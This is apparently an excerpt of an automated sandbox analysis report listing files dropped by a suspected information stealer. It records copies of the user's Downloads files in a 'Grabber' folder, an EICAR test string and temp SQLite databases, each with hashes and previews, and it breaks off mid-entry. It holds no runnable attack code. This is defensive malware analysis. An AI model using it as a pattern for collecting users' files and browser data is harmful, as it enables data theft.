KLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\PIVFAGEAAV.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\PWCCAWLGRE.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\SQSJKEBWDT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\SUAVTZKNFL.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\SUAVTZKNFL.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\eicar.com.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	EICAR virus test files
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.8723276870872425
Encrypted:	false
SSDEEP:	3:a+JraNvsgzsVqSwHq9:tJuOgzsko
MD5:	44D88612FEA8A8F36DE82E1278ABB02F
SHA1:	3395856CE81F2B7382DEE72602F798B642F14140
SHA-256:	275A021BBFB6489E54D471899F7DB9D1663FC695EC2FE2A2C4538AABF651FD0F
SHA-512:	CC805D5FAB1FD71A4AB352A9C533E65FB2D5B885518F4E565E68847223B8E6B85CB48F3AFAD842726D99239C9E36505C64B0DC9A061D9E507D833277ADA336AB
Malicious:	false
Preview:	X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\eicar.com.txt:Zone.Identifier

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.648822399290514
Encrypted:	false
SSDEEP:	3:gAWY33AtwXJYHYrSLo+om1NQWHY13uCOHEp2m:qY33Atj4GLo0Np4xu9C2m
MD5:	44D771955CD40C717F289831FB5E55C8
SHA1:	18A1E8B977D4DF534C0F114A238504C6BEA48528
SHA-256:	2F53D740D64731D3BA3BB304FDB5EFC6B473CCC21F55FA3088A4926B05F59EF1
SHA-512:	E5A77BCD4058E2C04B35A6331E36151F6410823B51FB8F7D3EDAF40954DB671395A2CFEE2FE318BD4759ACD792EA46212F81365EAEE1C792399758835B6BDF53
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..ReferrerUrl=https://www.eicar.org/..HostUrl=https://secure.eicar.org/eicar.com.txt..

C:\Users\user\AppData\Local\Temp\tmp76E4.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.035631294721445904
Encrypted:	false
SSDEEP:	192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
MD5:	59E4A8110FA2BCC012E341B93E96E93D
SHA1:	EE08810B0CE857F01170C08A24B9D438B64D577D
SHA-256:	3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
SHA-512:	2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
Malicious:	false
Preview:	SQLite format 3......@ .......)...........!...................9..................................S`....(e......}$\|.\|N{.{sz.z{z.yAx.x!w.v.wZu7tNt.s.s\r.rJq.p.q.p.o.o.o.m.mal&k.k.g.g3f.f.e.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7714.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp782E.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp784E.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7949.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4026573159402624
Encrypted:	false
SSDEEP:	48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
MD5:	F49DFF163167A43F4940B7337A092C07
SHA1:	1A8BAAC92537FA0BD39063D17C3072AD86190CC4
SHA-256:	B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
SHA-512:	BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp79A8.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.035631294721445904
Encrypted:	false
SSDEEP:	192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
MD5:	59E4A8110FA2BCC012E341B93E96E93D
SHA1:	EE08810B0CE857F01170C08A24B9D438B64D577D
SHA-256:	3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
SHA-512:	2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
Malicious:	false
Preview:	SQLite format 3......@ .......)...........!...................9..................................S`....(e......}$\|.\|N{.{sz.z{z.yAx.x!w.v.wZu7tNt.s.s\r.rJq.p.q.p.o.o.o.m.mal&k.k.g.g3f.f.e.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp79E7.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8702785449902919
Encrypted:	false
SSDEEP:	384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
MD5:	E782D8B6164B8CF64500A01B85E5FD38
SHA1:	C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
SHA-256:	E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
SHA-512:	1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
Malicious:	false
Preview:	SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7C1B.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8702785449902919
Encrypted:	false
SSDEEP:	384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
MD5:	E782D8B6164B8CF64500A01B85E5FD38
SHA1:	C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
SHA-256:	E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
SHA-512:	1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
Malicious:	false
Preview:	SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7E9C.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp818B.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp81EA.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8249.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
